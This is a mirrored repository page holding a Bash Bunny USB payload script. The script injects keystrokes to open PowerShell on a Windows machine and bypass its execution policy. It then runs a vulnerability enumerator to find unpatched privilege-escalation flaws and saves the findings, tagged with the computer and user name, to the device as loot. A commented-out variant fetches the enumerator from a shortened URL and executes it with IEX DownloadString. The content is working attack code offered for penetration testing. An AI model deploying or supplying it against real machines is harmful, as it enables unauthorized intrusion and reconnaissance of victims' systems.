hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/PrivEscChecker/payload.txt
illwill 147a71fe4f Added browsercreds, wificreds, and mrrobot payloads (#114) 
* Initial commit

HID Powershell attack to dump WiFiCreds

* Update readme.md

* changed initial LED blink color to white

* Changed initial LED color to white

* Changed initial LED Color to white

* swapped sync before LED

* switched from powershell to batch

* Update payload.txt

* using powershell again , updated version and LEDs

* using powershell, added usb eject,  Win 7,8,10

* added window resizing to hide payload typing

* Update payload.txt

* pull request

* BrowserCreds Pull

* separate powershell script called from payload

also added result detection

* update LEDs

* Update payload.txt

* initial commit

* Update payload.txt

* initial pull

* initial commit
2017-04-07 15:48:20 +10:00

90 lines
3.0 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: PrivEscChecker
# Author: illwill
# Version: 0.1
#
# Check Windows box for unpatched vulns that allow privilege escalation
# then stashes them in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
# Can be used locally or webdls the script from github
# Credits to rasta-mouse for their powershell script:
# https://github.com/rasta-mouse/Sherlock Sherlock.ps1
#
# Blue...............Running Script
# Purple.............Checking Results
# Green..............Found Possible Privilege Escalation
# Red................No Possible Privilege Escalation
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R 200
LOOTDIR=/root/udisk/loot/PrivEscChecker
mkdir -p $LOOTDIR
#cleanup any prior unfinished payloads
rm $LOOTDIR/DONE
rm $LOOTDIR/OUTPUT
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
########################################################################################################################
# Check for missing Windows update patches either by downloading or use local file (comment local and uncomment webdl) #
########################################################################################################################
# LOCAL FROM BUNNY
Q STRING PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\& \{Import-Module -Name \$Bunny\\payloads\\${SWITCH_POSITION}\\Sherlock.ps1\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt\}\"
# WEBDL FROM INTERNET
# Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nS1L45\'\)\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt
Q ENTER
Q DELAY 100
# Create a file called DONE with %ComputerName%-%username%
Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \$env:computername-\$env:username
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q STRING exit
Q ENTER
sync
#remount the drive and check results
LED R B 200
sleep 1
# Wait for the DONE file to be created so we know powershell is finished
LOOTDIR=/root/udisk/loot/PrivEscChecker
DONEFILE=$LOOTDIR/DONE
while [ ! -e $DONEFILE ]; do sleep .5; done;
sleep 1
# cat %ComputerName%-%username% from DONE as a variable to name folder and then delete
DIR=`cat $DONEFILE`
mkdir $LOOTDIR/$DIR
mv $LOOTDIR/OUTPUT.txt $LOOTDIR/$DIR/OUTPUT.txt
rm -f $DONEFILE
# Check OUTPUT.txt for any missing patches
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
LED G 200
else
LED R
fi
Reference in New Issue View Git Blame Copy Permalink